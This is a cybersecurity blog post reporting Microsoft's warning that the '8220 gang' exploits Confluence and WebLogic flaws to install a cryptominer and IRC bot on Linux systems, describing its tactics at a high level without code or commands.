Tuesday, October 15, 2024
HomeCyber Security BlogsMicrosoft warning: This malware that targets Linux just got a big update

Microsoft warning: This malware that targets Linux just got a big update

 

Microsoft has issued a warning in light of recent attempts by the “8220” malware group to infiltrate Linux computers and set up software for cryptomining. In order to install cryptominer malware on Linux systems, Microsoft claims to have discovered “notable changes” to the virus.

 

The so-called “8220 gang” organisation has come under fire from Microsoft for recent work that was discovered to be exploiting the serious problem affecting Atlassian Confluence Server and Data Center, identified as CVE-2022-26134.

“Over the last year, the organisation has actively upgraded its payloads and procedures. The most recent campaign employs RCE vulnerabilities for CVE-2022-26134 (Confluence) and CVE-2019-2725 (WebLogic) to get access to i686 and x86 64 Linux computers, respectively “According to Microsoft’s Security Intelligence Centre.

Microsoft issued a warning: “The upgrades install new versions of a cryptominer and an IRC bot and make use of an exploit for a newly reported vulnerability.”

 

Security company Check Point found that the 8220 gang was utilising the Atlassian weakness to install malware on Linux computers within a week after the bug’s disclosure by Atlassian on June 2. By injecting a script into a PowerShell memory process exploiting the Atlassian bug, the organisation was also focusing on Windows computers.

Federal organisations had already been told by CISA to patch the issue by June 6 and to prohibit all internet access to the product in the meantime.

 

The 8220 gang is a Chinese-speaking, Monero-mining threat actor whose C2’s frequently interact through port 8220, hence its name. According to Cisco’s Talos Intelligence division, it has been active since 2017. At that time, they were trying to attack corporate systems by exploiting vulnerabilities in Docker and Apache Struts2.

Microsoft claims that after the 8220 gang successfully exploits CVE-2022-26134 to gain access to a system, it downloads a loader that modifies the system’s settings to turn off security services, instals a cryptominer, establishes persistence on a network, and then scans ports on the network to find additional servers.

Because the loader deletes log files and disables security and monitoring capabilities in the cloud, Microsoft advises administrators to enable Defender for Endpoint tamper protection settings.

 

The pwnRig cryptominer (v1.41.9) is downloaded by the loader, and an IRC bot uses a C2 server to execute instructions. It maintains functionality after a reboot by setting up cronjobs or scripts that execute nohup or “no hangup” commands every 60 seconds.

“The loader searches the network for additional SSH servers using the IP port scanner tool “masscan,” and then propagates by using the GoLang-based SSH brute force tool “spirit.” Additionally, it searches the local disc for SSH keys so that it may connect to known hosts and migrate laterally “Google says.

IEMA IEMLabs
IEMA IEMLabshttps://iemlabs.com
IEMLabs is an ISO 27001:2013 and ISO 9001:2015 certified company, we are also a proud member of EC Council, NASSCOM, Data Security Council of India (DSCI), Indian Chamber of Commerce (ICC), U.S. Chamber of Commerce, and Confederation of Indian Industry (CII). The company was established in 2016 with a vision in mind to provide Cyber Security to the digital world and make them Hack Proof. The question is why are we suddenly talking about Cyber Security and all this stuff? With the development of technology, more and more companies are shifting their business to Digital World which is resulting in the increase in Cyber Crimes.
RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Most Popular

Recent Comments

Izzi Казино онлайн казино казино x мобильді нұсқасы on Instagram and Facebook Video Download Made Easy with ssyoutube.com
Temporada 2022-2023 on CamPhish
2017 Grammy Outfits on Meesho Supplier Panel: Register Now!
React JS Training in Bangalore on Best Online Learning Platforms in India
DigiSec Technologies | Digital Marketing agency in Melbourne on Buy your favourite Mobile on EMI
亚洲A∨精品无码一区二区观看 on Restaurant Scheduling 101 For Better Business Performance

Write For Us